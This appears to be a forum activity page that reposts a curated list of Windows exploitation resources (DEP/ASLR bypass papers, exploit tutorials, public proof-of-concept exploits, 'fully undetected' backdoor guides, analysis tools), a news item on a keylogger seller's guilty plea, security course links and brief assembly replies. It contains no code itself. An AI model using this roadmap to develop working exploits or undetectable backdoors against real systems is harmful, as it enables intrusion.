- Buffer overflow attacks bypassing DEP (NX/XD bits) – part 1 - by Marco Mastropaolo [2005]
- Buffer overflow attacks bypassing DEP (NX/XD bits) – part 2 - by Marco Mastropaolo [2005]
- Practical Rop - by Dino Dai Zovi [2010]
- Exploitation with WriteProcessMemory - by Spencer Pratt [2010]
- Exploitation techniques and mitigations on Windows - by skape
- A little return oriented exploitation on Windows x86 – Part 1 - by Harmony Security and Stephen Fewer [2010]
- A little return oriented exploitation on Windows x86 – Part 2 - by Harmony Security and Stephen Fewer [2010]

Windows memory protections
Windows memory protections Introduction Articles.
- Data Execution Prevention
- /GS (Buffer Security Check)
- /SAFESEH
- ASLR
- SEHOP

Bypassing filter and protections
Windows memory protections Bypass Methods Articles.
- Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002]
- Creating Arbitrary Shellcode In Unicode Expanded Strings - by Chris Anley
- Advanced windows exploitation - by Dave Aitel [2003]
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server - by David Litchfield
- Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) - by Matt Conover at CanSecWest 2004
- Safely Searching Process Virtual Address Space - by Matt Miller [2004]
- IE exploit that used a technique called Heap Spray
- Bypassing hardware-enforced DEP - by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005]
- Exploiting Freelist[0] On XP Service Pack 2 - by Brett Moore [2005]
- Kernel-mode Payloads on Windows in uninformed
- Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
- Exploiting Common Flaws In Drivers
- Heap Feng Shui in JavaScript - by Alexander Sotirov [2007]
- Understanding and bypassing Windows Heap Protection - by Nicolas Waisman [2007]
- Heaps About Heaps - by Brett Moore [2008]
- Bypassing browser memory protections in Windows Vista - by Mark Dowd and Alex Sotirov [2008]
- Attacking the Vista Heap - by Ben Hawkes [2008]
- Return oriented programming Exploitation without Code Injection - by Hovav Shacham (and others) [2008]
- Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 - by Cesar Cerrudo [2008]
- Defeating DEP Immunity Way - by Pablo Sole [2008]
- Practical Windows XP/2003 Heap Exploitation - by John McDonald and Chris Valasek [2009]
- Bypassing SEHOP - by Stefan Le Berre, Damien Cauquil [2009]
- Interpreter Exploitation: Pointer Inference and JIT Spraying - by Dionysus Blazakis [2010]
- Write-up of Pwn2Own 2010 - by Peter Vreugdenhil
- All in one 0day presented in rootedCON - by Ruben Santamarta [2010]
- DEP/ASLR bypass using 3rd party - by Shahin Ramezany [2013]

Typical windows exploits
- Real-world HW-DEP bypass Exploit - by Devcode
- Bypassing DEP by returning into HeapCreate - by Toto
- First public ASLR bypass exploit by using partial overwrite - by Skape
- Heap spray and bypassing DEP - by Skylined
- First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability
- Exploit codes of bypassing browsers memory protections
- PoC's on Token Kidnapping. PoC for 2k3 - part 1 - by Cesar Cerrudo
- PoC's on Token Kidnapping. PoC for 2k8 - part 2 - by Cesar Cerrudo
- An exploit that works from win 3.1 to win 7 - by Tavis Ormandy (KiTra0d)
- Old ms08-067 metasploit module multi-target and DEP bypass
- PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
- SMBv2 Exploit - by Stephen Fewer
- Microsoft IIS 7.5 remote heap buffer overflow - by redpantz
- Browser Exploitation Case Study for Internet Explorer 11 - by Moritz Jodeit [2016]

Exploit development tutorial series
Exploit Development Tutorial Series Based on the Windows Operating System Articles.

Corelan Team
- Exploit writing tutorial part 1: Stack Based Overflows
- Exploit writing tutorial part 2: Stack Based Overflows – jumping to shellcode
- Exploit writing tutorial part 3: SEH Based Exploits
- Exploit writing tutorial part 3b: SEH Based Exploits – just another example
- Exploit writing tutorial part 4: From Exploit to Metasploit – The basics
- Exploit writing tutorial part 5: How debugger modules & plugins can speed up basic exploit development
- Exploit writing tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
- Exploit writing tutorial part 7: Unicode – from 0x00410041 to calc
- Exploit writing tutorial part 8: Win32 Egg Hunting
- Exploit writing tutorial part 9: Introduction to Win32 shellcoding
- Exploit writing tutorial part 10: Chaining DEP with ROP – the Rubik's Cube
- Exploit writing tutorial part 11: Heap Spraying Demystified

Fuzzysecurity
- Part 1: Introduction to Exploit Development
- Part 2: Saved Return Pointer Overflows
- Part 3: Structured Exception Handler (SEH)
- Part 4: Egg Hunters
- Part 5: Unicode 0x00410041
- Part 6: Writing W32 shellcode
- Part 7: Return Oriented Programming
- Part 8: Spraying the Heap Chapter 1: Vanilla EIP
- Part 9: Spraying the Heap Chapter 2: Use-After-Free
- Part 10: Kernel Exploitation -> Stack Overflow
- Part 11: Kernel Exploitation -> Write-What-Where
- Part 12: Kernel Exploitation -> Null Pointer Dereference
- Part 13: Kernel Exploitation -> Uninitialized Stack Variable
- Part 14: Kernel Exploitation -> Integer Overflow
- Part 15: Kernel Exploitation -> UAF
- Part 16: Kernel Exploitation -> Pool Overflow
- Part 17: Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit)
- Heap Overflows For Humans 101
- Heap Overflows For Humans 102
- Heap Overflows For Humans 102.5
- Heap Overflows For Humans 103
- Heap Overflows For Humans 103.5

Securitysift
- Windows Exploit Development – Part 1: The Basics
- Windows Exploit Development – Part 2: Intro to Stack Based Overflows
- Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules
- Windows Exploit Development – Part 4: Locating Shellcode With Jumps
- Windows Exploit Development – Part 5: Locating Shellcode With Egghunting
- Windows Exploit Development – Part 6: SEH Exploits
- Windows Exploit Development – Part 7: Unicode Buffer Overflows

Whitehatters Academy
- Intro to Windows kernel exploitation 1/N: Kernel Debugging
- Intro to Windows kernel exploitation 2/N: HackSys Extremely Vulnerable Driver
- Intro to Windows kernel exploitation 3/N: My first Driver exploit
- Intro to Windows kernel exploitation 3.5/N: A bit more of the HackSys Driver
- Backdoor 103: Fully Undetected
- Backdoor 102
- Backdoor 101

TheSprawl
- corelan - integer overflows - exercise solution
- heap overflows for humans - 102 - exercise solution
- exploit exercises - protostar - final levels
- exploit exercises - protostar - network levels
- exploit exercises - protostar - heap levels
- exploit exercises - protostar - format string levels
- exploit exercises - protostar - stack levels
- open security training - introduction to software exploits - uninitialized variable overflow
- open security training - introduction to software exploits - off-by-one
- open security training - introduction to re - bomb lab secret phase
- open security training - introductory x86 - buffer overflow mystery box
- corelan - tutorial 10 - exercise solution
- corelan - tutorial 9 - exercise solution
- corelan - tutorial 7 - exercise solution
- getting from seh to nseh
- corelan - tutorial 3b - exercise solution

Tools
Disassemblers, debuggers, and other static and dynamic analysis tools.
- angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab.
- BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework.
- binnavi - Binary analysis IDE for reverse engineering based on graph visualization.
- Bokken - GUI for Pyew and Radare.
- Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
- codebro - Web based code browser using clang to provide basic code analysis.
- dnSpy - .NET assembly editor, decompiler and debugger.
- Evan's Debugger (EDB) - A modular debugger with a Qt GUI.
- GDB - The GNU debugger.
- GEF - GDB Enhanced Features, for exploiters and reverse engineers.
- hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols.
- IDA Pro - Windows disassembler and debugger, with a free evaluation version.
- Immunity Debugger - Debugger for malware analysis and more, with a Python API.
- ltrace - Dynamic analysis for Linux executables.
- objdump - Part of GNU binutils, for static analysis of Linux binaries.
- OllyDbg - An assembly-level debugger for Windows executables.
- PANDA - Platform for Architecture-Neutral Dynamic Analysis.
- PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands.
- pestudio - Perform static analysis of Windows executables.
- Process Monitor - Advanced monitoring tool for Windows programs.
- Pyew - Python tool for malware analysis.
- Radare2 - Reverse engineering framework, with debugger support.
- SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
- strace - Dynamic analysis for Linux executables.
- Udis86 - Disassembler library and tool for x86 and x86_64.
- Vivisect - Python tool for malware analysis.
- X64dbg - An open-source x64/x32 debugger for Windows.

Source: https://github.com/enddo/awesome-windows-exploitation
  16. A 21-year-old former Langley High School student, who won a Programmer of the Year Award in high school, pleaded guilty on Friday to charges of developing and selling custom key-logging malware that infected thousands of victims. Zachary Shames from Virginia pleaded guilty in a federal district court and now faces a maximum penalty of up to 10 years in prison for his past deeds.

Shames was arrested this summer while he was working as a technical intern at Northrop Grumman, a security and defense government contractor, developing front-end site code and backend Java software and managing a MySQL database, according to what appears on his LinkedIn page. According to a press release from the U.S. Department of Justice, Shames developed a keylogger in 2013 that allowed users to steal sensitive information, including passwords and banking credentials, from a victim's computer, while he was still a high school student in 2013. A keylogger is malicious software designed to record every keystroke on a victim's computer.

Shames developed the first versions of the now-defunct keylogger known as Limitless Logger Pro, which he sold for $35 on the infamous Hack Forums, according to an anonymous security researcher quoted by Motherboard. Shames "continued to modify and market the illegal product from his college dorm room" at James Madison University in Harrisonburg, Va., and sold it to more than 3,000 people who, in turn, infected over 16,000 victims, the U.S. Attorney's Office said.

The keylogger malware developed by Shames slowly turned into a powerful tool. According to TrendMicro (pdf), apart from key-logging, Limitless KeyLogger can also recover account names and passwords from many popular applications, such as Apple Safari, Firefox, Opera, Google Chrome, Bitcoin wallets, Core FTP, DynDNS, FileZilla, Internet Download Manager, Internet Explorer, Spotify, and more.

Shames pleaded guilty in an Alexandria courtroom, and Judge Liam O'Grady accepted his plea. Shames now faces a maximum penalty of up to 10 years in prison, and his sentencing is scheduled for June 16, 2017. Source: http://thehackernews.com/2017/01/limitless-keylogger-pro.html
  17. This is for someone who wants to jump into kernel debugging but, like me, thought it was very difficult to get set up and working properly. It turns out it's actually a lot easier than you think. Part 1: https://vvalien1.wordpress.com/2016/12/26/kernel-debugging-101/ Part 2: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part2/ Part 3: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part3/
  18. Lecture videos:
- Video Preview
- Introduction
- Secure C 101
- Secure C 102
- Secure C 103
- Code Auditing
- Linux & Permissions Spectrum
- Windows Overview
- Rootkits
- Reverse Engineering 101
- Reverse Engineering 102
- Fuzzing 101
- Midterm Review
- Fuzzing 102
- Exploitation 101
- Exploitation 102
- Exploitation 103
- Networking 101
- Networking 102
- Web Exploitation 101
- Web Exploitation 102
- Web Exploitation 103
- Exploitation 104
- Exploitation 105
- Exam 2 Review
- Exploitation 106
- History of Exploitation
- Exploitation 107
- Social Engineering & Physical Security
- Digital Forensics & Incident Response
- Tying All The Things Together
http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html
  19. Usr6

    [ASM] Noob

    It's not at fault, it just optimizes the code. As MrGrj says: project properties -> build -> "optimize code", or, if you really insist, edit the executable file with OllyDbg and put mov edx, dword ptr [0x8CCE6C] there instead of: mov edx, plm.exe+4CCE6C
  20. Usr6

    [ASM] Noob

    mov edx, dword ptr [0x8CCE6C] loads 4 bytes from that location; use word if you need 2, or byte if you only need the first byte. Alternatively: push dword ptr [0x8CCE6C] / pop edx
  21. Usr6

    [ASM] Noob

    Have you tried? jmp 0x8CCE6C or push 0x8CCE6C jmp ebp